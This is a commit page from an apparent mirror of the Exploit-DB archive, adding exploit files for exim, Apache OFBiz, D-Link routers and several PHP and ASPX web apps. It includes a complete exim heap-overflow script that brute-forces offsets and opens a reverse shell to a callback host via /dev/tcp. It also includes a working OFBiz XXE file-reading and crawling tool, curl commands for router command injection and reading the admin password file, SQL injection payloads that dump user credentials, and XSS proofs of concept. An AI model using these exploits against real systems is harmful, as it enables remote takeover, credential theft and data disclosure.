bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-25

Browse source 
15 changes to exploits/shellcodes

Adult Filter 1.0 - Denial of Service (PoC)

Microsoft Data Sharing - Local Privilege Escalation (PoC)

Webmin 1.5 - Web Brute Force (CGI)

exim 4.90 - Remote Code Execution
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
SG ERP 1.0 - 'info' SQL Injection
Fifa Master XLS 2.3.2 - 'usw' SQL Injection
Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
Apache OFBiz 16.11.04 - XML External Entity Injection
D-Link Routers - Command Injection
D-Link Routers - Plaintext Password
D-Link Routers - Directory Traversal

Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
This commit is contained in:
Offensive Security 2018-10-25 05:01:46 +00:00
parent 4f60a3d8f2
commit dac8dd4731
15 changed files with 1127 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
exploits/aspx/webapps/45668.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
# Dork: n/a
# Date: 2018-10-11
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE: N/A
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=

23
exploits/hardware/webapps/45676.md Normal file
View file

@ -0,0 +1,23 @@
## Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.

24
exploits/hardware/webapps/45677.md Normal file
View file

@ -0,0 +1,24 @@
## Password stored in plaintext
CVE: CVE-2018-10824
Description:
An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822
`$ curl http://routerip/uir//tmp/XXX/0`
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.

27
exploits/hardware/webapps/45678.md Normal file
View file

@ -0,0 +1,27 @@
Directory Traversal
CVE: CVE-2018-10822
CVSS v3: 8.6
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Description: Directory traversal vulnerability in the web interface on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware
allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.
PoC:
`$ curl http://routerip/uir//etc/passwd`
The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.
This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.

125
exploits/java/webapps/45673.py Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection
# Date: 2018-10-15
# Exploit Author: Jamie Parfet
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://archive.apache.org/dist/ofbiz/
# Version: < 16.11.04
# Tested on: Ubuntu 18.04.1
# CVE: N/A
#!/usr/bin/env python3
# *****************************************************
# Type: XML External Entity Injection (File disclosure)
# Target: Apache OFBiz < 16.11.04
# Author: Jamie Parfet
# *****************************************************
import sys
import os
import requests
import urllib3
import re
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]>
<methodCall><methodName>xXx
&disclose;xXx</methodName></methodCall>
"""
if len(sys.argv) <= 1:
print('[*] Apache OFBiz < 16.11.04 XXE')
print('[*] Use "%s -h" to display help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u",
metavar="https://localhost:8443",
dest="url",
required=True,
help="Target URL (required)",
action='store')
parser.add_argument("-f",
metavar="/etc/passwd",
dest="file",
help="Target file",
action='store')
parser.add_argument("-c",
metavar="/home/",
dest="crawl",
help="Target directory to start crawling from",
action='store')
parser.add_argument("-o",
metavar="~/local/output/directory/",
dest="output_dir",
help="Local directory that remote file will be saved to",
action='store')
args = parser.parse_args()
url = args.url if args.url else None
target_file = args.file if args.file else None
crawl_dir = args.crawl if args.crawl else None
output_dir = args.output_dir if args.output_dir else None
def check_url(url):
if '://' not in url:
print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url))
exit(0)
else:
return url
def request(url, payload):
response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).text
parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response)
return parsed_response
def crawl(crawl_dir):
payload = simple_payload.format(crawl_dir)
response = request(url, payload)
payload_404 = simple_payload.format(crawl_dir + "/xX404Xx")
response_404 = request(url, payload_404)
if 'No such file or directory' in response:
print("[-] ERROR - 404: {}".format(crawl_dir))
elif 'Permission denied' in response or 'but is not accessible' in response:
print("[-] ERROR - Permission: {}".format(crawl_dir))
elif 'Not a directory' in response_404:
print("[*] FILE: {}".format(crawl_dir))
else:
print("[*] DIR: {}".format(crawl_dir))
for f in response.splitlines():
full_path = (crawl_dir + '/' + f)
crawl(full_path)
def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir):
if url:
check_url(url)
if crawl_dir:
crawl(crawl_dir)
else:
payload = simple_payload.format(target_file)
if output_dir:
if os.path.isdir(output_dir):
result = request(url, payload)
remote_file_name = re.sub('/', '--', target_file)
output_file = (output_dir + '/' + remote_file_name[2:])
file = open(output_file, 'w')
file.write(result)
file.close()
else:
print("[-] ERROR: {} is not a writeable directory".format(output_dir))
else:
result = request(url, payload)
print(result)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nKeyboard interrupt detected.')
print('Exiting...')
exit(0)

605
exploits/linux/remote/45671.py Executable file
View file

@ -0,0 +1,605 @@
# Exploit Title: exim 4.90 - Remote Code Execution
# Date: 2018-10-24
# Exploit Author: hackk.gr
# Vendor Homepage: exim.org
# Version: exim < 4.90
# Tested on: debian exim 4.89, ubuntu exim 4.86_2
# CVE : CVE-2018-6789
#!/usr/bin/python
#debian exim 4.89
#ubuntu exim 4.86_2
import time
import socket
import struct
import os
import os.path
import sys
import ssl
import random
from multiprocessing import Process, Queue
s = None
f = None
test = True
rcpt_index_start = 0x120
bufsize = 8200
def connect(host, port):
global s
global f
s = socket.create_connection((host,port))
f = s.makefile("rw", bufsize=0)
def p(v):
return struct.pack("<Q", v)
def readuntil(delim='\n'):
data = ''
auth_plain_available = False
while True:
l = f.readline()
if l == "":
return ""
if l.find("PLAIN") > -1:
auth_plain_available = True
if test:
if len(l) > 70:
sys.stdout.write(l[:70] + " ...\n")
sys.stdout.flush()
else:
print l.strip("\r").strip("\n")
data = data + l
if data.find(delim) > -1:
return data
if l == "\n" or l == "":
return ""
return data
def write(data):
f.write(data + "\n")
def ehlo(v):
write("EHLO " + v)
return readuntil('HELP')
def unrec(v):
write(v)
readuntil('command')
def auth_plain(v):
encode = v.encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode)
l = f.readline()
if test:
if l.find("not advert") > -1 or l.find("not supported")> -1:
raise Exception("NO AUTH PLAIN CONFIG")
print l
def auth_plain1(v):
encode = v.encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode)
l = f.readline()
if test:
if l.find("Incorrect") > -1:
raise Exception("WRONG DRIVER")
if l.find("not advert") > -1 or l.find("not supported")> -1:
raise Exception("NO AUTH PLAIN CONFIG")
print l
def auth_plain2(v,value):
encode = v.encode('base64').replace('\n','').replace('=','')
value = chr(value).encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode[:-1] + value)
l = f.readline()
if test:
if l.find("Incorrect") > -1:
raise Exception("WRONG DRIVER")
if l.find("not advert") > -1 or l.find("not supported")> -1:
raise Exception("NO AUTH PLAIN CONFIG")
print l
def one_byte_overwrite():
v = "C" * bufsize
encode = v.encode('base64').replace('\n','').replace('=','')
encode = encode[:-1] + "PE"
write("AUTH PLAIN " + encode)
l = f.readline()
if test:
if l.find("Incorrect") > -1:
raise Exception("WRONG DRIVER")
if l.find("not advert") > -1 or l.find("not supported")> -1:
raise Exception("NO AUTH PLAIN CONFIG")
print l
lookup_table = {0x00: [0,3],
0x01: [0,7],
0x02: [0,11],
0x03: [0,15],
0x04: [0,19],
0x05: [0,23],
0x06: [0,27],
0x07: [0,31],
0x08: [0,35],
0x09: [0,39],
0x0a: [0,43],
0x0b: [0,47],
0x0c: [0,51],
0x0d: [0,55],
0x0e: [0,59],
0x0f: [0,63],
0x10: [0,67],
0x11: [0,71],
0x12: [0,75],
0x13: [0,79],
0x14: [0,83],
0x15: [0,87],
0x16: [0,91],
0x17: [0,95],
0x18: [0,99],
0x19: [0,103],
0x1a: [0,107],
0x1b: [0,111],
0x1c: [0,115],
0x1d: [0,119],
0x1e: [0,123],
0x1f: [0,127],
0x20: [0,131],
0x21: [0,135],
0x22: [0,139],
0x23: [0,143],
0x24: [0,147],
0x25: [0,151],
0x26: [0,155],
0x27: [0,159],
0x28: [0,163],
0x29: [0,167],
0x2a: [0,171],
0x2b: [0,175],
0x2c: [0,179],
0x2d: [0,183],
0x2e: [0,187],
0x2f: [0,191],
0x30: [0,195],
0x31: [0,199],
0x32: [0,203],
0x33: [0,207],
0x34: [0,211],
0x35: [0,215],
0x36: [0,219],
0x37: [0,223],
0x38: [0,227],
0x39: [0,231],
0x3a: [0,235],
0x3b: [0,239],
0x3c: [0,243],
0x3d: [0,247],
0x3e: [0,251],
0x3f: [0,254],
0x40: [64,3],
0x41: [64,7],
0x42: [64,11],
0x43: [64,15],
0x44: [64,19],
0x45: [64,23],
0x46: [64,27],
0x47: [64,31],
0x48: [64,35],
0x49: [64,39],
0x4a: [64,43],
0x4b: [64,47],
0x4c: [64,51],
0x4d: [64,55],
0x4e: [64,59],
0x4f: [64,63],
0x50: [64,67],
0x51: [64,71],
0x52: [64,75],
0x53: [64,79],
0x54: [64,83],
0x55: [64,87],
0x56: [64,91],
0x57: [64,95],
0x58: [64,99],
0x59: [64,103],
0x5a: [64,107],
0x5b: [64,111],
0x5c: [64,115],
0x5d: [64,119],
0x5e: [64,123],
0x5f: [64,127],
0x60: [64,131],
0x61: [64,135],
0x62: [64,139],
0x63: [64,143],
0x64: [64,147],
0x65: [64,151],
0x66: [64,155],
0x67: [64,159],
0x68: [64,163],
0x69: [64,167],
0x6a: [64,171],
0x6b: [64,175],
0x6c: [64,179],
0x6d: [64,183],
0x6e: [64,187],
0x6f: [64,191],
0x70: [64,195],
0x71: [64,199],
0x72: [64,203],
0x73: [64,207],
0x74: [64,211],
0x75: [64,215],
0x76: [64,219],
0x77: [64,223],
0x78: [64,227],
0x79: [64,231],
0x7a: [64,235],
0x7b: [64,239],
0x7c: [64,243],
0x7d: [64,247],
0x7e: [64,251],
0x7f: [64,254],
0x80: [128,3],
0x81: [128,7],
0x82: [128,11],
0x83: [128,15],
0x84: [128,19],
0x85: [128,23],
0x86: [128,27],
0x87: [128,31],
0x88: [128,35],
0x89: [128,39],
0x8a: [128,43],
0x8b: [128,47],
0x8c: [128,51],
0x8d: [128,55],
0x8e: [128,59],
0x8f: [128,63],
0x90: [128,67],
0x91: [128,71],
0x92: [128,75],
0x93: [128,79],
0x94: [128,83],
0x95: [128,87],
0x96: [128,91],
0x97: [128,95],
0x98: [128,99],
0x99: [128,103],
0x9a: [128,107],
0x9b: [128,111],
0x9c: [128,115],
0x9d: [128,119],
0x9e: [128,123],
0x9f: [128,127],
0xa0: [128,131],
0xa1: [128,135],
0xa2: [128,139],
0xa3: [128,143],
0xa4: [128,147],
0xa5: [128,151],
0xa6: [128,155],
0xa7: [128,159],
0xa8: [128,163],
0xa9: [128,167],
0xaa: [128,171],
0xab: [128,175],
0xac: [128,179],
0xad: [128,183],
0xae: [128,187],
0xaf: [128,191],
0xb0: [128,195],
0xb1: [128,199],
0xb2: [128,203],
0xb3: [128,207],
0xb4: [128,211],
0xb5: [128,215],
0xb6: [128,219],
0xb7: [128,223],
0xb8: [128,227],
0xb9: [128,231],
0xba: [128,235],
0xbb: [128,239],
0xbc: [128,243],
0xbd: [128,247],
0xbe: [128,251],
0xbf: [128,254],
0xc0: [192,3],
0xc1: [192,7],
0xc2: [192,11],
0xc3: [192,15],
0xc4: [192,19],
0xc5: [192,23],
0xc6: [192,27],
0xc7: [192,31],
0xc8: [192,35],
0xc9: [192,39],
0xca: [192,43],
0xcb: [192,47],
0xcc: [192,51],
0xcd: [192,55],
0xce: [192,59],
0xcf: [192,63],
0xd0: [192,67],
0xd1: [192,71],
0xd2: [192,75],
0xd3: [192,79],
0xd4: [192,83],
0xd5: [192,87],
0xd6: [192,91],
0xd7: [192,95],
0xd8: [192,99],
0xd9: [192,103],
0xda: [192,107],
0xdb: [192,111],
0xdc: [192,115],
0xdd: [192,119],
0xde: [192,123],
0xdf: [192,127],
0xe0: [192,131],
0xe1: [192,135],
0xe2: [192,139],
0xe3: [192,143],
0xe4: [192,147],
0xe5: [192,151],
0xe6: [192,155],
0xe7: [192,159],
0xe8: [192,163],
0xe9: [192,167],
0xea: [192,171],
0xeb: [192,175],
0xec: [192,179],
0xed: [192,183],
0xee: [192,187],
0xef: [192,191],
0xf0: [192,195],
0xf1: [192,199],
0xf2: [192,203],
0xf3: [192,207],
0xf4: [192,211],
0xf5: [192,215],
0xf6: [192,219],
0xf7: [192,223],
0xf8: [192,227],
0xf9: [192,231],
0xfa: [192,235],
0xfb: [192,239],
0xfc: [192,243],
0xfd: [192,247],
0xfe: [192,251],
0xff: [192,254],
}
def exploit(b1, b2, b3, rcpt_index, target, cb, cbport):
global s
global f
#if c % 0x50 == 0:
# print " byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x" % (b1, b2, b3, rcpt_index)
try:
connect(target, 25)
except:
raise Exception("CONNECTION ERROR")
banner = f.readline()
if test:
print banner.strip("\r").strip("\n")
ehlo("A" * 8000)
ehlo("B" * 16)
unrec("\xff" * 2000)
ehlo("D" * bufsize)
one_byte_overwrite()
fake_header = p(0)
fake_header += p(0x1f51)
res = auth_plain1("E" * 176 + fake_header + "E" * (bufsize-176-len(fake_header)))
res = ehlo("F" * 16)
if res == "":
raise Exception("CRASHED")
unrec("\xff" * 2000)
unrec("\xff" * 2000)
fake_header = p(0x4110)
fake_header += p(0x1f50)
auth_plain("G" * 176 + fake_header + "G" * (bufsize-176-len(fake_header)))
auth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1])
res = ehlo("I" * 16)
if res == "":
s.close()
f.close()
raise Exception("EHLO(I)")
acl_smtp_rcpt_offset = rcpt_index
local_host = cb
local_port = cbport
cmd = "/usr/bin/setsid /bin/bash -c \"/bin/bash --rcfile <(echo 'echo " + "0x%02x " % b1 + "0x%02x " % b2 + "0x%02x " % b3 + "0x%04x " % rcpt_index + "') -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
cmd_expansion_string = "${run{" + cmd + "}}\0"
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\x00")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
write("MAIL FROM:<postmaster@localhost>")
res = f.readline()
if res != "":
if test:
raise Exception("NO TARGET")
raise Exception("OFFSET")
raise Exception("BYTE")
write("RCPT TO:<postmaster@localhost>")
readuntil("Accepted")
write("RCPT TO:<postmaster@localhost>")
if f.readline() == "":
s.close()
f.close()
raise Exception("RCPT TO")
def checkvuln(host):
try:
exploit(0xff, 0xff, 0xff, rcpt_index_start, host, "127.0.0.1", "1337")
except Exception as e:
print e
if str(e) == "EHLO(I)":
return True
return False
def _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q):
if b1 > 0xff or b2 > 0xff or b3 > 0xff:
q.put([b1,b2,b3,"VALUE"])
return
try:
exploit(b1, b2, b3, rcpt_index, target, cb, cbport)
except Exception as e:
e = str(e)
if e == "[Errno 104] Connection reset by peer" or e.find("EOF occurred") > -1:
e = "BYTE"
q.put([b1,b2,b3,e])
if __name__ == '__main__':
if len(sys.argv) < 4:
print "%s <cb> <cbport> <target>" % sys.argv[0]
sys.exit(1)
target = sys.argv[3]
cb = sys.argv[1]
cbport = sys.argv[2]
if len(sys.argv) == 8:
print "reuse fixed offsets"
b1 = int(sys.argv[4], 16)
b2 = int(sys.argv[5], 16)
b3 = int(sys.argv[6], 16)
rcpt_index = int(sys.argv[7], 16)
try:
exploit(b1, b2, b3, rcpt_index, target, cb, cbport)
except Exception as e:
print e
sys.exit(1)
print "check vuln"
if not checkvuln(target):
print "false"
sys.exit(1)
print "true"
test=False
allbytes = [offset for offset in xrange(0, 0x110)]
allbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)]
b3_survived = []
b3_survived_stop = False
tested = []
try:
q = Queue()
procs = []
print
print "Discover first byte in offset"
print
sys.stdout.write("Try Offsets %02x%02x%02x to %02x%02x%02x ..." % (0x00,0xff,0xff,0xff,0xff,0xff))
for b3 in allbytes:
if b3 % 0x10 == 0 and b3 <= 0xff:
sys.stdout.write("\rTry Offsets %02x%02x%02x to %02x%02x%02x ..." % (b3,0xff,0xff,0xff,0xff,0xff))
b1 = 0x00
for b2 in allbytes_10:
proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))
procs.append(proc)
proc.daemon = True
proc.start()
to_break = False
if len(procs) == 16:
for i in xrange(0,16):
result = q.get()
if result[3] == "BYTE":
if [b3, b2] not in tested:
tested.append([b3, b2])
b3_survived.append(result[2])
sys.stdout.write("\nOffset %02x%02x%02x Survived ..." % (result[2],result[1],result[0]))
else:
to_break = True
procs[:] = []
if to_break:
break
print "\n"
print "Discover offsets for rcpt index brute force ..."
print
b1_survived = {}
for b3 in b3_survived:
for b2 in allbytes:
if b2 % 0x10 == 0 and b2 <= 0xff:
sys.stdout.write("\r\r\nTry Offsets %02x%02x%02x to %02x%02x%02x ... " % (b3,b2,0x00,b3,0xff,0xf0))
for b1 in allbytes_10:
proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))
procs.append(proc)
proc.daemon = True
proc.start()
if len(procs) == 16:
for i in xrange(0,16):
result = q.get()
if result[3] == "OFFSET":
if result[2] not in b1_survived:
b1_survived[result[2]] = []
b1_survived[result[2]].append(result)
sys.stdout.write("\n%02x%02x%02x Survived ..." % (result[2],result[1],result[0]))
procs[:] = []
iteration_list = [n for n in xrange(0x100,0x1000,0x10)]
iteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)]
for n in iteration_list2:
iteration_list.append(n)
b1_survived_priority = []
b1_survived_additional = []
for key in sorted(b1_survived):
if len(b1_survived[key]) < 7:
b1_survived_priority.append(b1_survived[key])
else:
b1_survived_additional.append(b1_survived[key])
_b1_survived = []
for result in b1_survived_priority:
_b1_survived.append(result)
for result in b1_survived_additional:
_b1_survived.append(result)
print "\n"
print "Start rcpt index brute force ..."
print
for result in _b1_survived:
for s in result:
sys.stdout.write("\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ..." % (s[2],s[1],s[0]))
for rcpt_index in iteration_list:
proc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q))
procs.append(proc)
proc.daemon = True
proc.start()
if len(procs) == 16:
for i in xrange(0,16):
q.get()
procs[:] = []
except KeyboardInterrupt:
pass
print "done."

0
exploits/multiple/remote/745.cgi → exploits/multiple/remote/745.pl Normal file → Executable file
View file

89
exploits/php/webapps/45666.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: SG ERP 1.0 - 'info' SQL Injection
# Dork: N/A
# Date: 2018-10-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://fankstribe.org/
# Software Link: https://sourceforge.net/projects/sgerp/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/valida_login.php
#
# [PATH]/valida_login.php
#
# 05 $login = @$_POST['login'];
# 06 $senha = @$_POST['senha'];
# POST /[PATH]/valida_login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
login='='&senha='='
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 15:43:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 46
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# http://localhost/[PATH]/index.php
GET /ExploitDb/GP%20ERP/index.php HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/valida_login.php
Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 15:43:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1950
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?mod=est&bot=tes3&info=[SQL]
GET /[PATH]/index.php?mod=est&bot=tes3&info=-4++uniOn++selecT+0x496873616e%2c0x496873616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e-- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 15:50:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

61
exploits/php/webapps/45667.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: Fifa Master XLS 2.3.2 - 'usw' SQL Injection
# Dork: N/A
# Date: 2018-10-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://fankstribe.org/
# Software Link: https://sourceforge.net/projects/fifamasterxls/files/latest/download
# Version: 2.3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/chat.php?action=chatname&usw=[SQL]
#
# Registered users can run...
/* `exploitdb`.`f_user` */
$f_user = array(
array('userID' => '2','access' => 'Registered','userName' => 'efe','firstname' => 'efe','lastName' => 'efe','userEmail' => 'efe@omerefe.com','userPassword' => 'a0b92793d636e4ccee294c6548cb35b3','avatar' => '0.jpg','ban' => '0')
);
#
# [PATH]/chat.php 166
#
# 163 function chatName() {
# 164 $un = '';
# 165 global $con;
# 166 $su=$_GET['usw'];
# 167
# 168 $sc2=mysql_query("select userName from f_user where userID='$su' limit 1");
# 169 while($row_sc2=mysql_fetch_array($sc2))
# 170 {
# [PATH]/js/chat.js 337
#
# 336 jQuery.ajax({
# 337 url: "chat.php?action=chatname&usw="+item.f,
# 338 cache: false,
# 339 dataType: "json",
# 340 async: false,
# 341 success: function(data)
GET /[PATH]/chat.php?action=chatname&usw=-%27++uNiOn+sElecT++(seLEcT(@x)FRom(SElecT(@x:=0x00)%20,(sELeCt(@x)fRom(f_user)whERe(@x)In(@x:=conCat(0x20,@x,0x557365726e616d653a20,userName,0x3c62723e,0x506173733a20,userPassword,0x3c62723e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=io5hsssef7l7nich1si2gk99k5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2018 00:12:37 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 148
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

48
exploits/php/webapps/45672.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://pokkho.com/lango/
# Software Link : http://pokkho.com/lango/auth/login
# Software : LANGO - Codeigniter Multilingual Script
# Version : 1.0
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : CVE-2018-18416
# LANGO Codeigniter Multilingual Script 1.0 has XSS in the input and upload sections, as demonstrated by the
# site_name parameter to the admin/settings/update URI.
# HTTP POST Request :
POST /lango/admin/settings/update HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/lango/admin/settings
Content-Type: multipart/form-data; boundary=---------------------------180989082911182658591910516947
Content-Length: 3150615
Cookie: csrf_cookie_name=4eeae5fca11e4ae108d667b67b52a0b3; ci_session=7ghu11a49n5ethf596t6g1ec5kfscncp
Connection: close
